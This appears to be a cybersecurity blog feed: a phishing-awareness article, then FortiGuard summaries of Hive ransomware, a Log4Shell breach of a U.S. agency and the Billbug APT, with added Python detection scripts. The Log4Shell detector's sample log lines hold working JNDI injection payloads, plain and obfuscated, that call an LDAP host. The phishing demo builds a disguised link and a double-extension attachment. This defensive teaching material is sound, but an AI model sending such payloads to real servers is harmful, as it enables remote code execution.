10 Ways to spot a phishing attempt


The content of this post is solely the responsibility of the author.  AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article. 

Phishing attacks are becoming more and more common, and they’re only getting more sophisticated. While there are a variety of ways to defend yourself against phishing attacks, one of the best methods is simply to be able to spot them. With that in mind, here are 10 common signs that an email or other communication may be a phishing attempt.

Calls from an unknown number

If you get a call from an unknown number and the caller claims to be from your bank or another organization, be very careful. This is a classic phishing tactic carried out over the phone, often called vishing.

The caller will try to obtain personal information from you, such as your credit card number, your Social Security number, or a one-time code that was just sent to your phone. They might also direct you to a website or send you a link that installs malware or captures your login details.

Don't give out any personal information to someone who calls you out of the blue, and don't visit a site or click a link because a caller told you to. Hang up and call the organization they claimed to be from using a number you know to be legitimate (e.g., the number on the back of your credit card or from the organization's website).

A reverse phone lookup can show where a number is registered, but treat the result as weak evidence: caller ID is easily spoofed, so the number displayed on your phone can be made to look like the organization's real one. Calling back on a number you already trust is the check that actually matters.

The message is not personalized

If you receive an email that doesn’t address you by name or refers to you as “Dear User” or “Dear Valued Customer,” be wary. Phishing emails often use generic greetings in an attempt to seem more widespread – and less suspicious – than they actually are.

That's because they are usually sent out en masse as part of an automated campaign. Phishers typically have only a list of email addresses; the goal is not to learn the name behind each one or to personalize anything, but to get as many recipients as possible to click the links in the message. The reverse does not hold, though: targeted messages (spear phishing) do use your name, your employer, and your colleagues' names, so a personalized greeting is not proof that an email is legitimate.

The sender’s email address doesn’t match the organization they’re claiming to represent

This is a pretty straightforward way to spot a phishing attempt. If you get an email purporting to be from your bank, but the email address it comes from is something like johnsmith12345@gmail.com, then it’s pretty clear that something is not right.

Organizations don't send official communications from a Gmail or Hotmail address; they use their own domain name (e.g., wellsfargo.com, paypal.com). So, if the email you receive comes from anything other than the organization's official domain, it's a huge red flag. Three caveats make this check stronger. First, look at the actual address, not just the display name: many mail clients show only "Wells Fargo" and hide the address behind it. Second, watch for lookalike domains, such as a misspelling of the real name or the real name with an extra word attached, since those are what a careful phisher uses. Third, a matching domain is not proof by itself, because the From header can be forged; it is the receiving mail system's SPF, DKIM and DMARC checks that make a sender domain trustworthy.

There are grammatical errors or typos in the email

If you receive an email that is full of grammatical errors, typos, or just generally seems to be poorly written, it’s a good indicator that it’s a phishing email.

Phishers often send out their emails quickly and without much care or attention to detail. So if an email looks like it was dashed off in a hurry, with no regard for proper spelling or grammar, it’s probably a phishing email.

Many phishing campaigns originate overseas and are written by people who aren't native English speakers, so strange phrasing is another giveaway. Don't rely on this sign alone, though: well-funded and targeted campaigns produce clean, fluent text, and a flawlessly written email can still be phishing.

The message is urgent or includes a sense of urgency

Phishers often try to create a sense of urgency in their emails in order to get people to act quickly without thinking. They might say that your account is about to be closed, or that you need to take action immediately to prevent some kind of negative consequence.

That urgency is the point: the phisher wants you to click before you think. Legitimate organizations rarely demand immediate action by email, so if a message pushes you to act right now, slow down and verify the claim through the organization's own website or phone number rather than through anything in the message.

The email contains attachments that you weren’t expecting

If you receive an email with an attachment that you weren't expecting, be very careful before opening it. Unexpected attachments are another common phishing tactic.

The phisher sends an attachment that looks benign, such as a PDF, an invoice, or an Office document. Opening it can run malware (for example through a macro or script embedded in the file, or through a double extension such as .pdf.exe that hides an executable behind a document icon) or open a fake login page that harvests your credentials.

If you don't know the sender, or the email looks suspicious in any way, don't open the attachment. If the sender is someone you know but you weren't expecting a file from them, confirm through a channel you already trust (a phone call, a chat message) before opening it; their account may have been compromised. Otherwise, delete the email and move on.

The email contains threats or ultimatums

Phishers will sometimes try to intimidate their victims into taking action by including threats or ultimatums in their emails. They might say that your account will be closed if you don’t take action, or that you’ll be subject to legal action if you don’t respond.

Such threats are a pressure tactic: the phisher wants you scared enough to act without thinking. If an email threatens you, treat it as a likely phishing attempt and verify the claim through the organization's official channels, never through a number or link in the message itself.

The email asks for personal information

Phishers will often try to obtain personal information from their victims, such as credit card numbers, Social Security numbers, or login credentials. They might do this by asking you to fill out a form with your personal information. Or they might include a link that takes you to a fake website where you’re prompted to enter your personal information.

Never give out personal information in response to an email, and don't follow a link in an email to a page that asks for it. If you need to update your account information, go to the site yourself, by typing the address or using a bookmark you already have, and log in there. Don't do it through the email or any link in it.
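The attachment warning and the link warning above can both be checked mechanically before anyone opens anything. The following is an added example, not code from the original article: it parses a raw message with Python's standard library, flags attachments whose names carry an executable or double extension, and pulls every link out of the HTML body to compare the host the visible text shows against the host the link actually goes to. It also catches two other URL tricks: a raw IP address as the host, and a fake site name placed before an "@" so that the browser ignores it. The extension lists and the sample message are constructed for the demonstration.

```python
# Added example: body and attachment checks for the phishing red flags above.
# Not code from the original article; standard library only.
import os
import re
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from html.parser import HTMLParser
from urllib.parse import urlparse

# Extensions that run code when opened. Assumption: tune this list to your environment.
RISKY_EXTENSIONS = {".exe", ".scr", ".js", ".vbs", ".bat", ".cmd", ".ps1",
                    ".hta", ".lnk", ".iso", ".img", ".jar", ".docm", ".xlsm"}
# Harmless-looking extensions phishers put in front of the real one ("invoice.pdf.exe").
DECOY_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt"}
IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> tag in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url_or_domain):
    """Lower-cased host of a URL or bare domain; '' if there is none."""
    candidate = url_or_domain if "://" in url_or_domain else "http://" + url_or_domain
    return (urlparse(candidate).hostname or "").lower()


def same_site(a, b):
    """True when the hosts are equal or one is a subdomain of the other."""
    return a == b or a.endswith("." + b) or b.endswith("." + a)


def link_findings(html):
    """Red flags in the links of an HTML body."""
    collector = LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        target = host_of(href)
        if IPV4_HOST.match(target):
            findings.append(f"link to raw IP address: {href}")
        if "@" in urlparse(href).netloc:
            # http://bank.example@evil.example/ : the browser treats the part before
            # '@' as a user name and connects to evil.example
            findings.append(f"link hides its real host behind '@': {href}")
        looks_like_url = "." in text and " " not in text
        if looks_like_url and target and not same_site(host_of(text), target):
            findings.append(f"link text '{text}' points to a different host: {target}")
    return findings


def attachment_findings(msg):
    """Red flags in attachment names (the content itself is not inspected here)."""
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        stem, ext = os.path.splitext(name.lower())
        _, inner_ext = os.path.splitext(stem)
        if ext in RISKY_EXTENSIONS:
            findings.append(f"attachment '{name}' has executable extension {ext}")
            if inner_ext in DECOY_EXTENSIONS:
                findings.append(f"attachment '{name}' uses a double extension to look like {inner_ext}")
    return findings


def analyze_email(raw_bytes):
    """Return the list of red flags for one raw RFC 5322 message."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_bytes)
    findings = attachment_findings(msg)
    body = msg.get_body(preferencelist=("html",))
    if body is not None:
        findings.extend(link_findings(body.get_content()))
    return findings


def build_sample():
    """Constructed phishing-style message used to demonstrate the checks."""
    msg = EmailMessage()
    msg["From"] = "Billing <billing@example.com>"
    msg["To"] = "victim@example.net"
    msg["Subject"] = "Your invoice is overdue"
    msg.set_content("Please see the attached invoice.")
    msg.add_alternative(
        '<p>Please review at <a href="http://203.0.113.5/login">'
        'https://secure.example.com/login</a> or '
        '<a href="http://example.com@203.0.113.5/x">here</a>.</p>',
        subtype="html")
    msg.add_attachment(b"MZ\x90\x00 constructed sample, not a real executable",
                       maintype="application", subtype="octet-stream",
                       filename="Invoice_2023.pdf.exe")
    return msg.as_bytes()


if __name__ == "__main__":
    for flag in analyze_email(build_sample()):
        print("!", flag)
```

On the constructed sample the checks report six findings: two for the double-extension attachment and two for each of the disguised links. Note what the script deliberately does not do: it never opens the attachment, and it treats a link whose text and target agree as unremarkable, which is not the same as safe.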

The email is from a free email service

If an email that claims to come from an organization is sent from a free email service like Gmail or Yahoo, that's a red flag. There is nothing inherently wrong with free email services, but phishers favor them because accounts cost nothing to create and require little or no identity verification.

So if you receive an email from a free email service, be extra careful. It’s not necessarily a phishing attempt, but it’s worth taking a closer look before taking any action.
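The two address checks above (the sender's domain not matching the organization, and a free-mail sender) can be scripted against the message headers rather than eyeballed. The following is an added example, not code from the original article: it parses a raw message with Python's standard library, compares the display name with the address domain, flags free-mail senders, catches the common character-swap class of lookalike domains, notices a Reply-To that diverges from the From address, and reads the Authentication-Results header that a receiving mail server adds when it evaluates SPF, DKIM and DMARC. The organization list, the free-mail list and the three messages are constructed assumptions for the demonstration.

```python
# Added example: header checks for the sender-address red flags above.
# Not code from the original article; standard library only.
import re
from email import policy
from email.parser import Parser
from email.utils import parseaddr

FREE_MAIL = {"gmail.com", "yahoo.com", "hotmail.com", "outlook.com", "aol.com"}
# Assumption: organizations the recipient deals with, and the domain each really uses.
KNOWN_ORGS = {"wells fargo": "wellsfargo.com", "paypal": "paypal.com"}
# Characters commonly swapped into lookalike domains, mapped back to what they imitate.
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})


def domain_of(addr):
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def skeleton(domain):
    """Collapse a domain so common lookalikes compare equal to the real name."""
    return domain.lower().translate(CONFUSABLES).replace("rn", "m").replace("vv", "w")


def auth_results(msg):
    """Read the Authentication-Results header (RFC 8601) added by the receiving server.
    Returns e.g. {'spf': 'pass', 'dkim': 'pass', 'dmarc': 'none'}; empty if absent."""
    results = {}
    for header in msg.get_all("Authentication-Results", []):
        for method, result in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", str(header), re.I):
            results[method.lower()] = result.lower()
    return results


def header_findings(raw_message):
    """Return a list of red flags found in the From, Reply-To and auth headers."""
    msg = Parser(policy=policy.default).parsestr(raw_message)
    findings = []
    display, addr = parseaddr(str(msg.get("From", "")))
    from_domain = domain_of(addr)
    _, reply = parseaddr(str(msg.get("Reply-To", "")))
    reply_domain = domain_of(reply)

    if from_domain in FREE_MAIL:
        findings.append(f"sender uses a free mail service: {from_domain}")
    for org, real in KNOWN_ORGS.items():
        is_real = from_domain == real or from_domain.endswith("." + real)
        if org in display.lower() and not is_real:
            findings.append(f"display name claims '{org}' but address domain is {from_domain}")
        if not is_real and skeleton(from_domain) == skeleton(real):
            findings.append(f"lookalike domain {from_domain} imitates {real}")
        if not is_real and real in from_domain:
            # e.g. paypal.com.evil.example: the real name appears, but not as the suffix
            findings.append(f"real domain {real} embedded in longer domain {from_domain}")
    if reply_domain and reply_domain != from_domain:
        findings.append(f"Reply-To goes to a different domain: {reply_domain}")

    auth = auth_results(msg)
    if not auth:
        findings.append("no Authentication-Results header: From domain is unverified")
    elif auth.get("dmarc") != "pass":
        findings.append(f"DMARC did not pass ({auth.get('dmarc', 'absent')}): From may be forged")
    return findings


# Constructed sample messages (not real mail).
LEGIT = """\
From: PayPal <service@paypal.com>
To: victim@example.net
Subject: Your monthly statement
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=paypal.com;
 dkim=pass header.d=paypal.com; dmarc=pass header.from=paypal.com

Your statement is ready in your account.
"""

FREE_MAIL_PHISH = """\
From: PayPal Security <johnsmith12345@gmail.com>
Reply-To: <support@paypa1.com>
To: victim@example.net
Subject: Urgent: verify your account
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=gmail.com;
 dkim=pass header.d=gmail.com; dmarc=none

Your account will be closed in 24 hours unless you verify.
"""

LOOKALIKE = """\
From: PayPal <service@paypa1.com>
To: victim@example.net
Subject: Account notice

Please log in to review a problem with your account.
"""

if __name__ == "__main__":
    for label, raw in (("legit", LEGIT), ("free-mail", FREE_MAIL_PHISH), ("lookalike", LOOKALIKE)):
        print(label, "->", header_findings(raw) or ["no findings"])
```

The free-mail sample is instructive: SPF and DKIM both pass, because Gmail genuinely sent it, yet it is still phishing. Authentication only proves who sent the mail, not that the sender is who the display name claims; the display-name check is what catches it. The lookalike check only covers character swaps, so domains built by adding words to the real name still need the human eye.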

Someone with no followers or friends adds you on social media

This one is more common on social media sites like Facebook and LinkedIn. If someone with no followers or friends adds you, that’s a red flag. It’s possible that they’re just trying to build up their network, but it’s also possible that they’re a phisher.

If someone with no followers or friends adds you on social media, be careful before accepting their friend request. Take a look at their profile and see if anything looks suspicious. If you’re not sure, err on the side of caution and don’t accept their request.

Conclusion

Phishing is a serious problem, and it’s only getting worse. By understanding how phishing works and knowing what to look for, you can protect yourself from these attacks.

If you're ever unsure about an email or a website, err on the side of caution and don't take any action. It's better to be safe than sorry. And if you think you might have been the victim of a phishing attack, change the password you entered (and on any other site where you reused it), ideally from a device you trust; turn on multi-factor authentication where it's offered; run a malware scan on your computer; and report the message to the organization it impersonated or to your IT or security team, so the same lure can be blocked for others.


Know thy enemy: thinking like a hacker can boost cybersecurity strategy


As group leader for Cyber Adversary Engagement at MITRE Corp., Maretta Morovitz sees value in getting to know the enemy – she can use knowledge about cyber adversaries to distract, trick, and deflect them and develop strategies to help keep threat actors from getting whatever they’re after.

That could mean placing decoys and lures that exploit their expectations for what an attacker will find when they first hack into an environment, she says. Or it could mean deliberately disorienting them by creating scenarios that don’t match up to those expectations. “It’s about how to drive defenses by knowing how the adversaries actually behave,” says Morovitz, who is also group leader for MITRE Engage, a cyber adversary engagement framework.



Alert (AA22-321A): #StopRansomware: Hive Ransomware


FortiGuard Labs is aware that the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) released a joint advisory on Hive ransomware as part of their #StopRansomware effort. Hive is a Ransomware-as-a-Service (RaaS) operation made up of developers and affiliates. It steals data, encrypts files on victims' machines, and demands a ransom both to recover the affected files and to keep the stolen data off its data leak site, "HiveLeaks", on the dark web.

Why is this Significant?

This is significant because Hive, according to the advisory, has victimized more than 1,300 enterprises globally and extorted around 100 million US dollars. The group has been active since June 2021 and has targeted not only private enterprises but also essential sectors such as government organizations and healthcare services.

What is Hive Ransomware?

Hive is a RaaS with two groups: developers and affiliates. The developers create, maintain, and update the ransomware and its infrastructure, including the "HiveLeaks" data leak site and the negotiation site. The affiliates find and infect victims, exfiltrate files, and deploy the ransomware across the victims' networks.

The latest Hive iterations are written in Rust; older variants are written in Go.

Reported initial infection vectors include emails and the exploitation of vulnerabilities such as CVE-2020-12812, CVE-2021-31207, CVE-2021-34473 and CVE-2021-34523.

Hive encrypts files on victims' machines, typically appending a ".hive" extension to the affected files, and drops a ransom note named "HOW_TO_DECRYPT.txt" that instructs victims to visit a negotiation site on Tor. The advisory also states that Hive is known to re-victimize organizations that were previously infected with Hive and recovered without paying the ransom, so recovery has to include closing the original entry point, not just restoring files.

What is the Status of Protection?

FortiGuard Labs provides the following AV signatures for recent Hive ransomware samples it collected:

- W32/Filecoder_Hive.A!tr.ransom
- W32/Filecoder_Hive.B!tr.ransom
- W32/Hive.4a4e!tr.ransom
- W32/Hive.B0FF!tr.ransom
- W32/Hive.d10e!tr.ransom
- W32/Hive.FD38!tr.ransom
- W64/Filecoder.AW!tr.ransom
- W64/Filecoder_Hive.A!tr.ransom
- W64/Filecoder_Hive.B!tr.ransom
- W64/Hive.31ec!tr.ransom
- W64/Hive.6bcb!tr.ransom
- W64/Hive.71de!tr.ransom
- W64/Hive.7cec!tr.ransom
- W64/Hive.933c!tr.ransom
- W64/Hive.A!tr
- W64/Hive.B0FF!tr.ransom
- W64/Hive.c2e4!tr.ransom
- W64/Hive.e550!tr.ransom
- W64/Hive.ea51!tr.ransom
- W32/Filecoder.507F!tr.ransom
- W32/Agent.0b0f!tr.ransom
- W32/Agent.32a5!tr.ransom
- W32/Agent.65e3!tr.ransom
- W32/Agent.69ce!tr.ransom
- W32/Agent.6d49!tr.ransom
- W32/Agent.7c49!tr.ransom
- W64/Agent.U!tr

All network IOCs in the advisory are blocked by Webfiltering.

FortiGuard Labs provides the following IPS signatures for the vulnerabilities reportedly exploited as initial infection vectors by Hive threat actors:

- MS.Exchange.MailboxExportRequest.Arbitrary.File.Write (CVE-2021-31207)
- MS.Exchange.Server.Autodiscover.Remote.Code.Execution (CVE-2021-34473)
- MS.Exchange.Server.Common.Access.Token.Privilege.Elevation (CVE-2021-34523)
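The two file-system artifacts named above, the ".hive" extension and the "HOW_TO_DECRYPT.txt" note, are the cheapest things to sweep for when triaging a suspected Hive infection. The following is an added example, not part of the FortiGuard write-up: a small Python sweep that walks a directory tree, counts both artifacts per directory, and builds a throwaway tree of constructed sample files so it can be run offline. The write-up says Hive "typically" uses this extension, so a clean sweep rules out only the documented behavior, not every variant.

```python
# Added example: sweep a directory tree for the Hive artifacts named in the advisory.
# Not part of the FortiGuard write-up; the demo tree below is constructed.
import os
import tempfile
from collections import defaultdict

RANSOM_NOTE = "how_to_decrypt.txt"   # note name from the advisory, matched case-insensitively
ENCRYPTED_EXT = ".hive"              # extension Hive typically appends to encrypted files


def scan_tree(root):
    """Map each directory containing a hit to {'notes': n, 'encrypted': n}."""
    hits = defaultdict(lambda: {"notes": 0, "encrypted": 0})
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            lower = name.lower()
            if lower == RANSOM_NOTE:
                hits[dirpath]["notes"] += 1
            elif lower.endswith(ENCRYPTED_EXT):
                hits[dirpath]["encrypted"] += 1
    return dict(hits)


def summarize(hits):
    """Roll the per-directory counts up into one verdict."""
    notes = sum(h["notes"] for h in hits.values())
    encrypted = sum(h["encrypted"] for h in hits.values())
    return {"directories": len(hits), "notes": notes,
            "encrypted_files": encrypted, "infected": bool(notes or encrypted)}


def build_demo_tree():
    """Constructed sample tree: two 'encrypted' files and a note in Documents, one clean file."""
    root = tempfile.mkdtemp(prefix="hive-demo-")
    docs = os.path.join(root, "Documents")
    os.makedirs(docs)
    for name in ("report.docx.hive", "budget.xlsx.HIVE", "HOW_TO_DECRYPT.txt"):
        with open(os.path.join(docs, name), "wb") as fh:
            fh.write(b"constructed sample, not real ransomware output")
    with open(os.path.join(root, "clean.txt"), "w") as fh:
        fh.write("untouched\n")
    return root


if __name__ == "__main__":
    root = build_demo_tree()
    report = scan_tree(root)
    for directory, counts in sorted(report.items()):
        print(f"{directory}: {counts['encrypted']} encrypted, {counts['notes']} ransom note(s)")
    print(summarize(report))
```

Point the sweep at a mounted copy of the suspect volume rather than the live host, so the triage itself does not touch an evidence source.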


Joint CyberSecurity Advisory on a U.S. Federal Agency Breached by Iranian Threat Actors


FortiGuard Labs is aware of a joint advisory (AA22-320A) issued by the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) on November 16, 2022. The advisory describes an Iranian government-sponsored campaign in which threat actors breached an unnamed U.S. federal agency and deployed a crypto miner and a hacking tool on the compromised network.

Why is this Significant?

This is significant because threat actors backed by the Iranian government compromised a U.S. federal agency and deployed XMRig (a cryptocurrency miner) and Mimikatz (a post-exploitation tool used for credential harvesting).

In February 2022, the Iranian threat actors reportedly compromised the agency by exploiting CVE-2021-44228, also known as Log4Shell, in an unpatched VMware Horizon server. This underlines the importance of timely patching of vulnerable systems.

How did the Attack Occur?

The initial infection vector was exploitation of CVE-2021-44228 (Log4Shell) in a vulnerable VMware Horizon server. Once the attacker had a foothold in the victim's network, they excluded the victim's C: drive from Windows Defender scanning and then downloaded and installed XMRig (mining software for the Monero cryptocurrency). The attacker used RDP to move laterally to other systems on the network, deployed PsExec (a free Microsoft tool for executing processes on remote systems) and Mimikatz (an open-source credential harvesting tool), and implanted Ngrok (a dual-use tunneling tool). The attacker also accessed the domain controller and retrieved a list of machines belonging to the domain, furthering the compromise.

What is CVE-2021-44228 (Log4Shell)?

CVE-2021-44228 is a remote code execution vulnerability in the popular Java-based logging library Log4j 2. Apache disclosed it publicly in early December 2021, although Proof-of-Concept (PoC) code is believed to have been available earlier. FortiGuard Labs previously released an Outbreak Alert and a Threat Signal for CVE-2021-44228; see the Appendix for links to "Outbreak Alert: Apache Log4j2 Vulnerability" and "Apache Log4J Remote Code Execution Vulnerability (CVE-2021-44228)".

What is the Status of Coverage?

FortiGuard Labs detects the malicious files in the advisory with the following AV signatures:

- Riskware/CoinMiner
- PossibleThreat

All reported network IOCs in the advisory are blocked by Webfiltering.

FortiGuard Labs has IPS coverage in place for CVE-2021-44228 (Log4Shell):

- Apache.Log4j.Error.Log.Remote.Code.Execution
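The Log4Shell trigger is easy to spot in web server logs when it is written plainly, but attackers hide it behind nested Log4j lookups and URL-encoding, which is exactly what a naive string match misses. The following is an added example, not part of the FortiGuard write-up: detection logic over constructed Apache-style log lines that URL-decodes each line, collapses the ${lower:…}, ${upper:…} and ${…:-default} lookups used in obfuscated payloads, and then matches the "${jndi:" trigger and extracts the callback server. The log lines are constructed and the 203.0.113.0/24 addresses are a documentation range.

```python
# Added example: Log4Shell (CVE-2021-44228) detection over web server log lines.
# Not part of the FortiGuard write-up; the log lines and addresses are constructed.
import re
from urllib.parse import unquote

JNDI_TRIGGER = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# ${lower:J} / ${upper:n}  ->  the letter itself
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${env:NOSUCHVAR:-j} / ${::-n}  ->  the default value after ':-'
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
CALLBACK = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+://[^/}\s]+)", re.IGNORECASE)


def normalize(text, max_rounds=10):
    """URL-decode and collapse nested Log4j lookups so obfuscated payloads read plainly.
    Innermost lookups contain no '${', so repeated substitution resolves the nesting."""
    text = unquote(unquote(text))  # twice: attackers also double-encode
    for _ in range(max_rounds):
        new = CASE_LOOKUP.sub(lambda m: m.group(1), text)
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def is_log4shell_attempt(line):
    return bool(JNDI_TRIGGER.search(normalize(line)))


def callback_of(line):
    """scheme://host[:port] the payload would make the server contact, or None."""
    m = CALLBACK.search(normalize(line))
    return m.group(1) if m else None


def scan_log(lines):
    """(line number, callback, raw line) for each line carrying a JNDI trigger."""
    return [(n, callback_of(line), line)
            for n, line in enumerate(lines, 1) if is_log4shell_attempt(line)]


# Constructed Apache combined-format lines: one plain payload, one URL-encoded and
# nested in the query string, one built entirely from lookups, and two benign lines.
LOG_LINES = [
    '203.0.113.7 - - [10/Dec/2021:10:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:10:12:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:10:12:03 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3A'
    'ldap%3A%2F%2F203.0.113.9%3A1389%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.10 - - [10/Dec/2021:10:12:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NOSUCHVAR:-j}${::-n}di:${lower:l}dap://203.0.113.9:1389/c}"',
    '203.0.113.11 - - [10/Dec/2021:10:12:05 +0000] "GET /docs/log4j HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, callback, line in scan_log(LOG_LINES):
        print(f"line {n}: JNDI lookup to {callback}")
```

The normalization is what matters: the third and fourth lines contain no literal "jndi" at all until the lookups are resolved, so matching the raw text would miss them. The extracted callback host is the value to pivot on next, since an outbound LDAP or RMI connection to it from the Java process is the sign that the attempt actually succeeded.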


APT Billbug Victimized Asian Certification Authority and Government Agencies


FortiGuard Labs is aware of a report that the APT group "Billbug" compromised a certificate authority (CA) as well as multiple government and defense organizations in Asia. Also known as Lotus Blossom and Thrip, the group has reportedly been active since 2009 and uses the custom backdoors "Hannotog" and "Sagerunex" alongside tools already present on compromised machines.

Why is this Significant?

This is significant because Billbug targeted a certificate authority. If the CA's certificates or signing keys were compromised, an attacker could sign malware so that it evades security solutions that trust the CA, and could issue certificates that allow them to impersonate sites and eavesdrop on HTTPS communications. The reports also indicate that multiple government and defense organizations in Asia were compromised by Billbug.

What is Billbug APT?

Billbug, also known as Lotus Blossom and Thrip, is a threat actor that has reportedly been active since at least 2009, with interests in U.S. organizations as well as government, defense, and communications organizations in Southeast Asia. Its primary motive is thought to be espionage.

Billbug employs living-off-the-land techniques alongside custom malware. The tools reportedly used by the group are:

- Hannotog backdoor
- Sagerunex backdoor
- AdFind
- Certutil
- LogMeIn
- Mimikatz
- NBTscan
- Ping
- Port Scanner
- PowerShell
- PsExec
- Route
- Tracert
- Winmail
- WinRAR
- WinSCP

What is the Status of Coverage?

FortiGuard Labs detects the files in the report with the following AV signatures:

- W32/Agent.QTP!tr
- W32/Elsentric.J!tr
- W32/Generic.A!tr
- W32/PossibleThreat
- W64/Agentb.F!tr
- W64/Agent.LF!tr
- W64/Elsentric.E!tr
- W64/Elsentric.G!tr
- Malicious_Behavior.SB
- PossibleThreat.PALLAS.H
- Riskware/Kryptik
